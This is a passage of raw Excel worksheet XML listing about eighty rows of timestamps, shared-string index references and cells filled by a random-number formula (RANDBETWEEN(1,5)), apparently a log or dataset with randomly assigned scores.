      </c>
      <c r="C27673" t="s">
        <v>41</v>
      </c>
      <c r="E27673">
        <v>8870440050</v>
      </c>
      <c r="F27673">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27674" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27674" s="1">
        <v>42874.237824074073</v>
      </c>
      <c r="C27674" t="s">
        <v>410</v>
      </c>
      <c r="E27674" s="2" t="s">
        <v>25181</v>
      </c>
      <c r="F27674">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27675" s="1">
        <v>42874.120636574073</v>
      </c>
      <c r="C27675" t="s">
        <v>73</v>
      </c>
      <c r="E27675" t="s">
        <v>25182</v>
      </c>
      <c r="F27675">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27676" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27676" s="1">
        <v>42874.11451388889</v>
      </c>
      <c r="C27676" t="s">
        <v>586</v>
      </c>
      <c r="E27676" s="2" t="s">
        <v>25183</v>
      </c>
      <c r="F27676">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27677" s="1">
        <v>42873.973738425928</v>
      </c>
      <c r="C27677" t="s">
        <v>144</v>
      </c>
      <c r="E27677" t="s">
        <v>25184</v>
      </c>
      <c r="F27677">
        <f t="shared" ca="1" si="432"/>
        <v>4</v>
      </c>
    </row>
    <row r="27678" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27678" s="1">
        <v>42873.9453125</v>
      </c>
      <c r="C27678" t="s">
        <v>229</v>
      </c>
      <c r="E27678" s="2" t="s">
        <v>25185</v>
      </c>
      <c r="F27678">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27679" s="1">
        <v>42873.932314814818</v>
      </c>
      <c r="C27679" t="s">
        <v>140</v>
      </c>
      <c r="D27679" t="s">
        <v>141</v>
      </c>
      <c r="E27679" t="s">
        <v>25186</v>
      </c>
      <c r="F27679">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27680" s="1">
        <v>42873.889814814815</v>
      </c>
      <c r="C27680" t="s">
        <v>139</v>
      </c>
      <c r="E27680" t="s">
        <v>25187</v>
      </c>
      <c r="F27680">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27681" s="1">
        <v>42873.753842592596</v>
      </c>
      <c r="C27681" t="s">
        <v>10</v>
      </c>
      <c r="D27681" t="s">
        <v>993</v>
      </c>
      <c r="E27681" t="s">
        <v>25188</v>
      </c>
      <c r="F27681">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27682" s="1">
        <v>42873.740162037036</v>
      </c>
      <c r="C27682" t="s">
        <v>10</v>
      </c>
      <c r="D27682" t="s">
        <v>107</v>
      </c>
      <c r="F27682">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27683" s="1">
        <v>42873.735763888886</v>
      </c>
      <c r="C27683" t="s">
        <v>6</v>
      </c>
      <c r="D27683" t="s">
        <v>25</v>
      </c>
      <c r="E27683" t="s">
        <v>25189</v>
      </c>
      <c r="F27683">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27684" s="1">
        <v>42873.719386574077</v>
      </c>
      <c r="C27684" t="s">
        <v>10</v>
      </c>
      <c r="D27684" t="s">
        <v>52</v>
      </c>
      <c r="E27684" t="s">
        <v>25190</v>
      </c>
      <c r="F27684">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27685" s="1">
        <v>42873.666712962964</v>
      </c>
      <c r="C27685" t="s">
        <v>10</v>
      </c>
      <c r="D27685" t="s">
        <v>271</v>
      </c>
      <c r="E27685" t="s">
        <v>25191</v>
      </c>
      <c r="F27685">
        <f t="shared" ca="1" si="432"/>
        <v>4</v>
      </c>
    </row>
    <row r="27686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27686" s="1">
        <v>42873.611851851849</v>
      </c>
      <c r="C27686" t="s">
        <v>10</v>
      </c>
      <c r="D27686" t="s">
        <v>89</v>
      </c>
      <c r="E27686" t="s">
        <v>25192</v>
      </c>
      <c r="F27686">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27687" s="1">
        <v>42873.592986111114</v>
      </c>
      <c r="C27687" t="s">
        <v>10</v>
      </c>
      <c r="D27687" t="s">
        <v>163</v>
      </c>
      <c r="E27687" t="s">
        <v>25193</v>
      </c>
      <c r="F27687">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27688" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27688" s="1">
        <v>42873.572245370371</v>
      </c>
      <c r="C27688" t="s">
        <v>10</v>
      </c>
      <c r="D27688" t="s">
        <v>263</v>
      </c>
      <c r="E27688" s="2" t="s">
        <v>25194</v>
      </c>
      <c r="F27688">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27689" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27689" s="1">
        <v>42873.555555555555</v>
      </c>
      <c r="C27689" t="s">
        <v>6</v>
      </c>
      <c r="D27689" t="s">
        <v>67</v>
      </c>
      <c r="E27689" s="2" t="s">
        <v>25195</v>
      </c>
      <c r="F27689">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27690" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A27690" s="1">
        <v>42873.545983796299</v>
      </c>
      <c r="C27690" t="s">
        <v>10</v>
      </c>
      <c r="D27690" t="s">
        <v>80</v>
      </c>
      <c r="E27690" s="2" t="s">
        <v>25196</v>
      </c>
      <c r="F27690">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27691" s="1">
        <v>42873.543553240743</v>
      </c>
      <c r="C27691" t="s">
        <v>107</v>
      </c>
      <c r="E27691" t="s">
        <v>25197</v>
      </c>
      <c r="F27691">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27692" s="1">
        <v>42873.533564814818</v>
      </c>
      <c r="C27692" t="s">
        <v>10</v>
      </c>
      <c r="D27692" t="s">
        <v>89</v>
      </c>
      <c r="E27692" t="s">
        <v>25198</v>
      </c>
      <c r="F27692">
        <f t="shared" ca="1" si="432"/>
        <v>2</v>
      </c>
    </row>
    <row r="27693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27693" s="1">
        <v>42873.485682870371</v>
      </c>
      <c r="C27693" t="s">
        <v>10</v>
      </c>
      <c r="D27693" t="s">
        <v>494</v>
      </c>
      <c r="E27693" t="s">
        <v>25199</v>
      </c>
      <c r="F27693">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27694" s="1">
        <v>42873.482615740744</v>
      </c>
      <c r="C27694" t="s">
        <v>344</v>
      </c>
      <c r="E27694" t="s">
        <v>25200</v>
      </c>
      <c r="F27694">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27695" s="1">
        <v>42873.440127314818</v>
      </c>
      <c r="C27695" t="s">
        <v>48</v>
      </c>
      <c r="E27695" t="s">
        <v>25201</v>
      </c>
      <c r="F27695">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27696" s="1">
        <v>42873.434606481482</v>
      </c>
      <c r="C27696" t="s">
        <v>10</v>
      </c>
      <c r="D27696" t="s">
        <v>86</v>
      </c>
      <c r="E27696" t="s">
        <v>25202</v>
      </c>
      <c r="F27696">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27697" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27697" s="1">
        <v>42873.425578703704</v>
      </c>
      <c r="C27697" t="s">
        <v>10</v>
      </c>
      <c r="D27697" t="s">
        <v>178</v>
      </c>
      <c r="E27697" s="2" t="s">
        <v>25203</v>
      </c>
      <c r="F27697">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27698" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A27698" s="1">
        <v>42873.416134259256</v>
      </c>
      <c r="C27698" t="s">
        <v>65</v>
      </c>
      <c r="E27698" s="2" t="s">
        <v>25204</v>
      </c>
      <c r="F27698">
        <f t="shared" ca="1" si="432"/>
        <v>4</v>
      </c>
    </row>
    <row r="27699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27699" s="1">
        <v>42873.361909722225</v>
      </c>
      <c r="C27699" t="s">
        <v>10</v>
      </c>
      <c r="D27699" t="s">
        <v>112</v>
      </c>
      <c r="E27699" t="s">
        <v>25205</v>
      </c>
      <c r="F27699">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27700" s="1">
        <v>42873.302407407406</v>
      </c>
      <c r="C27700" t="s">
        <v>124</v>
      </c>
      <c r="E27700" t="s">
        <v>25206</v>
      </c>
      <c r="F27700">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27701" s="1">
        <v>42873.299780092595</v>
      </c>
      <c r="C27701" t="s">
        <v>10</v>
      </c>
      <c r="D27701" t="s">
        <v>192</v>
      </c>
      <c r="E27701" t="s">
        <v>25207</v>
      </c>
      <c r="F27701">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27702" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27702" s="1">
        <v>42873.252129629633</v>
      </c>
      <c r="C27702" t="s">
        <v>71</v>
      </c>
      <c r="E27702" s="2" t="s">
        <v>25208</v>
      </c>
      <c r="F27702">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27703" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27703" s="1">
        <v>42873.213750000003</v>
      </c>
      <c r="C27703" t="s">
        <v>10</v>
      </c>
      <c r="D27703" t="s">
        <v>52</v>
      </c>
      <c r="E27703" s="2" t="s">
        <v>25209</v>
      </c>
      <c r="F27703">
        <f t="shared" ca="1" si="432"/>
        <v>5</v>
      </c>
    </row>
    <row r="27704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27704" s="1">
        <v>42873.189085648148</v>
      </c>
      <c r="C27704" t="s">
        <v>41</v>
      </c>
      <c r="E27704" t="s">
        <v>9512</v>
      </c>
      <c r="F27704">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27705" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27705" s="1">
        <v>42873.136655092596</v>
      </c>
      <c r="C27705" t="s">
        <v>71</v>
      </c>
      <c r="E27705" s="2" t="s">
        <v>25210</v>
      </c>
      <c r="F27705">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27706" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27706" s="1">
        <v>42873.13009259259</v>
      </c>
      <c r="C27706" t="s">
        <v>71</v>
      </c>
      <c r="E27706" s="2" t="s">
        <v>25211</v>
      </c>
      <c r="F27706">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27707" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27707" s="1">
        <v>42873.125254629631</v>
      </c>
      <c r="C27707" t="s">
        <v>339</v>
      </c>
      <c r="E27707" s="2" t="s">
        <v>25212</v>
      </c>
      <c r="F27707">
        <f t="shared" ca="1" si="432"/>
        <v>4</v>
      </c>
    </row>
    <row r="27708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27708" s="1">
        <v>42873.100740740738</v>
      </c>
      <c r="C27708" t="s">
        <v>319</v>
      </c>
      <c r="E27708" t="s">
        <v>25213</v>
      </c>
      <c r="F27708">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27709" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A27709" s="1">
        <v>42873.04515046296</v>
      </c>
      <c r="C27709" t="s">
        <v>71</v>
      </c>
      <c r="E27709" s="2" t="s">
        <v>25214</v>
      </c>
      <c r="F27709">
        <f t="shared" ca="1" si="432"/>
        <v>4</v>
      </c>
    </row>
    <row r="27710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27710" s="1">
        <v>42872.978761574072</v>
      </c>
      <c r="C27710" t="s">
        <v>314</v>
      </c>
      <c r="E27710" t="s">
        <v>25215</v>
      </c>
      <c r="F27710">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27711" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27711" s="1">
        <v>42872.931921296295</v>
      </c>
      <c r="C27711" t="s">
        <v>140</v>
      </c>
      <c r="D27711" t="s">
        <v>847</v>
      </c>
      <c r="E27711" s="2" t="s">
        <v>25216</v>
      </c>
      <c r="F27711">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27712" s="1">
        <v>42872.931215277778</v>
      </c>
      <c r="C27712" t="s">
        <v>139</v>
      </c>
      <c r="E27712" t="s">
        <v>25217</v>
      </c>
      <c r="F27712">
        <f t="shared" ca="1" si="432"/>
        <v>1</v>
      </c>
    </row>
    <row r="27713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27713" s="1">
        <v>42872.899050925924</v>
      </c>
      <c r="C27713" t="s">
        <v>10</v>
      </c>
      <c r="D27713" t="s">
        <v>163</v>
      </c>
      <c r="E27713" t="s">
        <v>25218</v>
      </c>
      <c r="F27713">
        <f t="shared" ca="1" si="432"/>
        <v>3</v>
      </c>
    </row>
    <row r="27714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27714" s="1">
        <v>42872.804502314815</v>
      </c>
      <c r="C27714" t="s">
        <v>10</v>
      </c>
      <c r="D27714" t="s">
        <v>6</v>
      </c>
      <c r="E27714" t="s">
        <v>25219</v>
      </c>
      <c r="F27714">
        <f t="shared" ref="F27714:F27777" ca="1" si="433">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="27715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27715" s="1">
        <v>42872.789224537039</v>
      </c>
      <c r="C27715" t="s">
        <v>10</v>
      </c>
      <c r="D27715" t="s">
        <v>993</v>
      </c>
      <c r="E27715" t="s">
        <v>25220</v>
      </c>
      <c r="F27715">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27716" s="1">
        <v>42872.76630787037</v>
      </c>
      <c r="C27716" t="s">
        <v>10</v>
      </c>
      <c r="D27716" t="s">
        <v>6</v>
      </c>
      <c r="E27716" t="s">
        <v>25221</v>
      </c>
      <c r="F27716">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27717" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27717" s="1">
        <v>42872.737453703703</v>
      </c>
      <c r="C27717" t="s">
        <v>10</v>
      </c>
      <c r="D27717" t="s">
        <v>86</v>
      </c>
      <c r="E27717" s="2" t="s">
        <v>25222</v>
      </c>
      <c r="F27717">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27718" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27718" s="1">
        <v>42872.714849537035</v>
      </c>
      <c r="C27718" t="s">
        <v>10</v>
      </c>
      <c r="D27718" t="s">
        <v>251</v>
      </c>
      <c r="E27718" s="2" t="s">
        <v>25223</v>
      </c>
      <c r="F27718">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27719" s="1">
        <v>42872.714143518519</v>
      </c>
      <c r="C27719" t="s">
        <v>10</v>
      </c>
      <c r="D27719" t="s">
        <v>36</v>
      </c>
      <c r="E27719" t="s">
        <v>25224</v>
      </c>
      <c r="F27719">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27720" s="1">
        <v>42872.713391203702</v>
      </c>
      <c r="C27720" t="s">
        <v>10</v>
      </c>
      <c r="D27720" t="s">
        <v>251</v>
      </c>
      <c r="F27720">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27721" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27721" s="1">
        <v>42872.703576388885</v>
      </c>
      <c r="C27721" t="s">
        <v>10</v>
      </c>
      <c r="D27721" t="s">
        <v>20</v>
      </c>
      <c r="E27721" s="2" t="s">
        <v>25225</v>
      </c>
      <c r="F27721">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27722" s="1">
        <v>42872.700949074075</v>
      </c>
      <c r="C27722" t="s">
        <v>10</v>
      </c>
      <c r="D27722" t="s">
        <v>112</v>
      </c>
      <c r="E27722" t="s">
        <v>25226</v>
      </c>
      <c r="F27722">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27723" s="1">
        <v>42872.693506944444</v>
      </c>
      <c r="C27723" t="s">
        <v>10</v>
      </c>
      <c r="D27723" t="s">
        <v>374</v>
      </c>
      <c r="E27723" t="s">
        <v>25227</v>
      </c>
      <c r="F27723">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27724" s="1">
        <v>42872.674016203702</v>
      </c>
      <c r="C27724" t="s">
        <v>10</v>
      </c>
      <c r="D27724" t="s">
        <v>158</v>
      </c>
      <c r="E27724" t="s">
        <v>25228</v>
      </c>
      <c r="F27724">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27725" s="1">
        <v>42872.634872685187</v>
      </c>
      <c r="C27725" t="s">
        <v>10</v>
      </c>
      <c r="D27725" t="s">
        <v>251</v>
      </c>
      <c r="E27725" t="s">
        <v>25229</v>
      </c>
      <c r="F27725">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27726" s="1">
        <v>42872.63417824074</v>
      </c>
      <c r="C27726" t="s">
        <v>2082</v>
      </c>
      <c r="F27726">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27727" s="1">
        <v>42872.629872685182</v>
      </c>
      <c r="C27727" t="s">
        <v>6</v>
      </c>
      <c r="D27727" t="s">
        <v>124</v>
      </c>
      <c r="E27727" t="s">
        <v>25230</v>
      </c>
      <c r="F27727">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27728" s="1">
        <v>42872.623217592591</v>
      </c>
      <c r="C27728" t="s">
        <v>10</v>
      </c>
      <c r="D27728" t="s">
        <v>14</v>
      </c>
      <c r="E27728" t="s">
        <v>25231</v>
      </c>
      <c r="F27728">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27729" s="1">
        <v>42872.591481481482</v>
      </c>
      <c r="C27729" t="s">
        <v>10</v>
      </c>
      <c r="D27729" t="s">
        <v>6</v>
      </c>
      <c r="E27729" t="s">
        <v>25232</v>
      </c>
      <c r="F27729">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27730" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27730" s="1">
        <v>42872.538819444446</v>
      </c>
      <c r="C27730" t="s">
        <v>16</v>
      </c>
      <c r="E27730" s="2" t="s">
        <v>25233</v>
      </c>
      <c r="F27730">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27731" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27731" s="1">
        <v>42872.532337962963</v>
      </c>
      <c r="C27731" t="s">
        <v>10</v>
      </c>
      <c r="D27731" t="s">
        <v>6</v>
      </c>
      <c r="E27731" s="2" t="s">
        <v>25234</v>
      </c>
      <c r="F27731">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27732" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27732" s="1">
        <v>42872.513680555552</v>
      </c>
      <c r="C27732" t="s">
        <v>10</v>
      </c>
      <c r="D27732" t="s">
        <v>80</v>
      </c>
      <c r="E27732" s="2" t="s">
        <v>25235</v>
      </c>
      <c r="F27732">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27733" s="1">
        <v>42872.507905092592</v>
      </c>
      <c r="C27733" t="s">
        <v>10</v>
      </c>
      <c r="D27733" t="s">
        <v>36</v>
      </c>
      <c r="E27733" t="s">
        <v>25236</v>
      </c>
      <c r="F27733">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27734" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27734" s="1">
        <v>42872.50576388889</v>
      </c>
      <c r="C27734" t="s">
        <v>71</v>
      </c>
      <c r="E27734" s="2" t="s">
        <v>25237</v>
      </c>
      <c r="F27734">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27735" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27735" s="1">
        <v>42872.47378472222</v>
      </c>
      <c r="C27735" t="s">
        <v>6</v>
      </c>
      <c r="D27735" t="s">
        <v>124</v>
      </c>
      <c r="E27735" s="2" t="s">
        <v>25238</v>
      </c>
      <c r="F27735">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27736" s="1">
        <v>42872.469386574077</v>
      </c>
      <c r="C27736" t="s">
        <v>344</v>
      </c>
      <c r="E27736" t="s">
        <v>5206</v>
      </c>
      <c r="F27736">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27737" s="1">
        <v>42872.468287037038</v>
      </c>
      <c r="C27737" t="s">
        <v>10</v>
      </c>
      <c r="D27737" t="s">
        <v>52</v>
      </c>
      <c r="E27737" t="s">
        <v>25239</v>
      </c>
      <c r="F27737">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27738" s="1">
        <v>42872.467662037037</v>
      </c>
      <c r="C27738" t="s">
        <v>41</v>
      </c>
      <c r="E27738" t="s">
        <v>25240</v>
      </c>
      <c r="F27738">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27739" s="1">
        <v>42872.451319444444</v>
      </c>
      <c r="C27739" t="s">
        <v>10</v>
      </c>
      <c r="D27739" t="s">
        <v>178</v>
      </c>
      <c r="E27739" t="s">
        <v>25241</v>
      </c>
      <c r="F27739">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27740" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27740" s="1">
        <v>42872.44431712963</v>
      </c>
      <c r="C27740" t="s">
        <v>10</v>
      </c>
      <c r="D27740" t="s">
        <v>667</v>
      </c>
      <c r="E27740" s="2" t="s">
        <v>25242</v>
      </c>
      <c r="F27740">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27741" s="1">
        <v>42872.44127314815</v>
      </c>
      <c r="C27741" t="s">
        <v>10</v>
      </c>
      <c r="D27741" t="s">
        <v>17</v>
      </c>
      <c r="E27741" t="s">
        <v>25243</v>
      </c>
      <c r="F27741">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27742" s="1">
        <v>42872.427905092591</v>
      </c>
      <c r="C27742" t="s">
        <v>10</v>
      </c>
      <c r="E27742" t="s">
        <v>25244</v>
      </c>
      <c r="F27742">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27743" s="1">
        <v>42872.405636574076</v>
      </c>
      <c r="C27743" t="s">
        <v>173</v>
      </c>
      <c r="E27743" t="s">
        <v>25245</v>
      </c>
      <c r="F27743">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27744" s="1">
        <v>42872.395949074074</v>
      </c>
      <c r="C27744" t="s">
        <v>48</v>
      </c>
      <c r="E27744" t="s">
        <v>25246</v>
      </c>
      <c r="F27744">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27745" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27745" s="1">
        <v>42872.386412037034</v>
      </c>
      <c r="C27745" t="s">
        <v>535</v>
      </c>
      <c r="E27745" s="2" t="s">
        <v>25247</v>
      </c>
      <c r="F27745">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27746" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A27746" s="1">
        <v>42872.381168981483</v>
      </c>
      <c r="C27746" t="s">
        <v>71</v>
      </c>
      <c r="E27746" s="2" t="s">
        <v>25248</v>
      </c>
      <c r="F27746">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27747" s="1">
        <v>42872.373900462961</v>
      </c>
      <c r="C27747" t="s">
        <v>10</v>
      </c>
      <c r="D27747" t="s">
        <v>23</v>
      </c>
      <c r="E27747" t="s">
        <v>25249</v>
      </c>
      <c r="F27747">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27748" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27748" s="1">
        <v>42872.342465277776</v>
      </c>
      <c r="C27748" t="s">
        <v>229</v>
      </c>
      <c r="E27748" s="2" t="s">
        <v>25250</v>
      </c>
      <c r="F27748">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27749" s="1">
        <v>42872.280011574076</v>
      </c>
      <c r="C27749" t="s">
        <v>92</v>
      </c>
      <c r="E27749" t="s">
        <v>25251</v>
      </c>
      <c r="F27749">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27750" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27750" s="1">
        <v>42872.267800925925</v>
      </c>
      <c r="C27750" t="s">
        <v>124</v>
      </c>
      <c r="E27750" s="2" t="s">
        <v>25252</v>
      </c>
      <c r="F27750">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27751" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27751" s="1">
        <v>42872.200659722221</v>
      </c>
      <c r="C27751" t="s">
        <v>69</v>
      </c>
      <c r="E27751" s="2" t="s">
        <v>25253</v>
      </c>
      <c r="F27751">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27752" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27752" s="1">
        <v>42872.199166666665</v>
      </c>
      <c r="C27752" t="s">
        <v>1080</v>
      </c>
      <c r="E27752" s="2" t="s">
